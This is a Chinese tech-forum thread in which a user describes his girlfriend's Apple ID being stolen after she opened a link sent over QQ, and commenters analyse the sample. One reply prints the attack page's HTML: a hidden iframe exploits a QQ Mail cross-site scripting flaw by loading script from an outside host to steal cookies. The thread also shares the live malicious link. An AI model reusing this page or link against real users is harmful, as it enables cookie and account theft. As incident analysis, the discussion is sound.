这是一个创建于 3313 天前的主题,其中的信息可能已经有所发展或是发生改变。
准确来说是女友的号,现在网易这么火,我也来凑个热闹,大家也有个防备
前一段时间,女朋友的 6 不慎被偷,期间各种钓鱼短信,在我的引导下都没有被对方获取密码
就在 17 号,手机过保的最后一天,有陌生 QQ 加女友,说是手机维修店的
发来一张图片问是不是她丢失的手机,打开后跳转到了一个 app 门户网站
然后电影开场了,我们去看电影就没注意,看完后就开始弹 apple id 的登录框了,我没敢让她输入,都是直接取消掉了
第二天我在电脑上登录 Apple ID 的时候帐号已经被窃了
然后我就觉得这么叼,很不解的拨通了苹果的客服电话
然后高潮来了
客户哥们儿操着浓厚的东北口音跟我说,你手机中病毒了,你打开那个网页的时候就中了木马,黑客获取到了你的信息,盗取了密码,建议我重装一遍设备的系统,要不有可能有残留的木马
我震惊了!!!就一个网页木马,就能盗取我的 apple id 帐号,这木马也太叼了吧
尼玛浏览器是不是就不要用了
apple id 账户系统太脆弱了吧
我开心的在互联网上冲着狼,突然我的 apple id 被盗了,然后手机被锁了,交完保护费才能使用
当时忘记问那哥们儿了
1. 重置密码有哪几种方式?
2. 黑客是用那种方式重置了我的密码?
3. 黑客利用病毒获取了我的那些信息重置了密码?
4. 黑客为什么能够通过网页木马在我的设备上获取足以重置帐号的信息?
apple id 是 Gmail ,辅助邮箱是 QQ
第二天重置密码的时候在 QQ 邮箱里面看到了黑客重置密码的邮件
照那东北哥们儿的口气是 apple id 环节出的问题,我也怀疑是 QQ 应用环节 QQ 密码被盗也有可能
有朋友遇到类似的情况吗
前一段时间,女朋友的 6 不慎被偷,期间各种钓鱼短信,在我的引导下都没有被对方获取密码
就在 17 号,手机过保的最后一天,有陌生 QQ 加女友,说是手机维修店的
发来一张图片问是不是她丢失的手机,打开后跳转到了一个 app 门户网站
然后电影开场了,我们去看电影就没注意,看完后就开始弹 apple id 的登录框了,我没敢让她输入,都是直接取消掉了
第二天我在电脑上登录 Apple ID 的时候帐号已经被窃了
然后我就觉得这么叼,很不解的拨通了苹果的客服电话
然后高潮来了
客户哥们儿操着浓厚的东北口音跟我说,你手机中病毒了,你打开那个网页的时候就中了木马,黑客获取到了你的信息,盗取了密码,建议我重装一遍设备的系统,要不有可能有残留的木马
我震惊了!!!就一个网页木马,就能盗取我的 apple id 帐号,这木马也太叼了吧
尼玛浏览器是不是就不要用了
apple id 账户系统太脆弱了吧
我开心的在互联网上冲着狼,突然我的 apple id 被盗了,然后手机被锁了,交完保护费才能使用
当时忘记问那哥们儿了
1. 重置密码有哪几种方式?
2. 黑客是用那种方式重置了我的密码?
3. 黑客利用病毒获取了我的那些信息重置了密码?
4. 黑客为什么能够通过网页木马在我的设备上获取足以重置帐号的信息?
apple id 是 Gmail ,辅助邮箱是 QQ
第二天重置密码的时候在 QQ 邮箱里面看到了黑客重置密码的邮件
照那东北哥们儿的口气是 apple id 环节出的问题,我也怀疑是 QQ 应用环节 QQ 密码被盗也有可能
有朋友遇到类似的情况吗
第 1 条附言 · 2015-10-21 08:51:33 +08:00
当时是在外面,用 iphone 手机打开的链接
样本: http://url789.com/K21Kz
样本: http://url789.com/K21Kz
 |
1
chairuosen 2015-10-21 01:01:51 +08:00
图片被下木马了吧?网游盗号都这么盗的。你打开图片(其实是 exe)电脑就被控了
|
 |
2
luckykong 2015-10-21 01:13:29 +08:00
打开一个图片跳转到网页 的时候,你就该怀疑这个图片到底正常不正常了。
如果是木马,后面记录了你一天的电脑使用情况,从之中找到你 qq 邮箱密码简直太容易了 |
 |
3
Yvette 2015-10-21 04:50:01 +08:00 via iPhone
這些人簡直無孔不入⋯
|
 |
4
bzw875 2015-10-21 06:01:22 +08:00 via iPhone
打开图片跳出一个网站,.exe 的图片吧?
|
 |
5
gaohongyuan 2015-10-21 07:33:44 +08:00 via Android
感谢分享经历,又涨了姿势。。
|
 |
6
virusdefender 2015-10-21 07:35:18 +08:00 via Android
图片怎么跳转网站?还有样本么
|
 |
7
chaim OP |
 |
8
bubuyu 2015-10-21 08:18:46 +08:00
苹果客服有东北口音的?我打过几次全都是台湾腔是怎么回事
|
 |
9
lawdoge 2015-10-21 09:13:54 +08:00
gmail 没有开两步验证对嘛楼主
|
 |
11
66beta 2015-10-21 09:46:27 +08:00
gmail 被撞库?
|
 |
12
qq2511296 2015-10-21 09:47:33 +08:00
这么牛逼 打开一个网站就能把账号盗了? 而且还是用 iPhone 打开的那个网站。。。。。。。。。。。。。 能通过一张图片 来打开网站? 手机 qq 能这样?
|
 |
13
chyiz 2015-10-21 09:52:05 +08:00
样本网站嵌了一个网易新闻页和一个 qq 邮箱页的 frame ……
|
 |
14
yxaaa123 2015-10-21 09:58:17 +08:00
一定是东北口音搞的鬼!!!
|
 |
15
huhuhushan 2015-10-21 10:07:44 +08:00  2
那个网站的源代码,
<!DOCTYPE html> <html> <head> <meta name="viewport" content="width=device-width" /> <title>iPhone6 plus 转让 国行 三网通 无拆修 保内 配件齐全</title> </head> <body> <iframe src="http://j.news.163.com/docs/98/2015101120/B5M0UJPA9001UJPB.html#p=3880026" style="width:100%;height:1000px;border:none"></iframe> <iframe src="http://open.mail.qq.com/cgi-bin/dy_preview?&t=dy_cutt&submit_id=xx&column_url=http%3a%2f%2fxc.jsled.com.cn%2fmail.xml&qqtype=lockKey2" style="display:none"></iframe> </body> </html> 嵌套了两个 frame |
|
16
chyiz 2015-10-21 10:11:45 +08:00 6
看来是 XSS 攻击
网易新闻页显示出来装样子的,但是 QQ 邮箱页面地址 hxxp://open.mail.qq.com/cgi-bin/dy_preview?&t=dy_cutt&submit_id=xx&column_url=http%3a%2f%2fxc.jsled.com.cn%2fmail.xml&qqtype=lockKey2 带了这网站的参数: hxxp://xc.jsled.com.cn/mail.xml xml 的文件内容: https://gist.github.com/chyiz/bea8d52bccd198f72eb9#file-mail-xml 加载 js: https://gist.github.com/chyiz/bea8d52bccd198f72eb9#file-response-js 大概就是这样盗取了 QQ 的 cookie 。。。 |
|
17
chyiz 2015-10-21 10:13:22 +08:00
|
 |
18
panlilu 2015-10-21 10:20:23 +08:00
涨姿势了
|
 |
19
ooTwToo 2015-10-21 10:34:55 +08:00
可怕
|
|
20
chaim OP |
 |
21
lifeOTdie 2015-10-21 11:18:08 +08:00
话说。。。我用电脑打开了你那个样本链接,我会发生什么奇怪的事情么
|
 |
22
izoabr 2015-10-21 11:52:52 +08:00
合着 QQ 邮箱有 XSS 的洞?
|
 |
24
jsq2627 2015-10-21 12:07:56 +08:00
我擦,这是 QQ 邮箱的 XSS 啊。。
楼上打开链接的感觉改 QQ 邮箱密码去。 |
|
25
jsq2627 2015-10-21 12:08:24 +08:00
感觉 -> 赶紧
|
 |
26
xiaoyao9933 2015-10-21 12:22:00 +08:00
这 XSS 漏洞提交乌云了么??看来 QQ 邮箱也不能用了。。
|
|
27
chaim OP @xiaoyao9933 http://open.mail.qq.com/cgi-bin/dy_preview 被攻击的地址现在已经 404 了
|
 |
28
xx314327475 2015-10-21 12:42:59 +08:00
@izoabr 有道理
|
 |
29
aliuwr 2015-10-21 12:51:23 +08:00
别大惊小怪了,网易也有类似的嘛。
http://wooyun.org/bugs/wooyun-2015-0147846 常去 wooyun 看就知道,不是自己电脑没木马就没事了,什么产品都是有一堆漏洞的。 提交到 wooyun 上的还能看到,提交到腾讯的就只有 “已修复” 了。 http://security.tencent.com/index.php/announcement/msg/84 自己能做的就是尽可能保护好关键的几个帐号,定期换复杂密码。 |
 |
30
RqPS6rhmP3Nyn3Tm 2015-10-21 13:02:58 +08:00
偷 Cookie 吗?现在花样真多
|
 |
31
wavingclear 2015-10-21 13:20:22 +08:00
手贱拿浏览器点开了那个链接
七八年来第一次改 QQ 密码…… |
 |
32
RitianZhao1988 2015-10-21 13:26:10 +08:00
已点开,改密码去...
|
 |
33
discrete 2015-10-21 13:30:08 +08:00
我点开了链接,赶快去看看 qq 邮箱,发现 cookies 过期了……
|
 |
34
jun0205 2015-10-21 13:35:20 +08:00
点开了,还好没上 QQ ,邮箱也没有登录。
|
 |
35
a591826944 2015-10-21 13:38:28 +08:00
@discrete 还好我的 cookie 也过期了
|
 |
36
wsy2220 2015-10-21 13:40:49 +08:00 via Android
黑产都这么牛了……
|
|
37
lawdoge 2015-10-21 16:39:26 +08:00
手机 qq 打开个别网页应用会授权自己的密码貌似,跟注册论坛应该是一个道理,之前用电脑端打开个别论坛不小心误按了授权也会被盗号。
总之 qq 真的是各种不靠谱 |
Select Language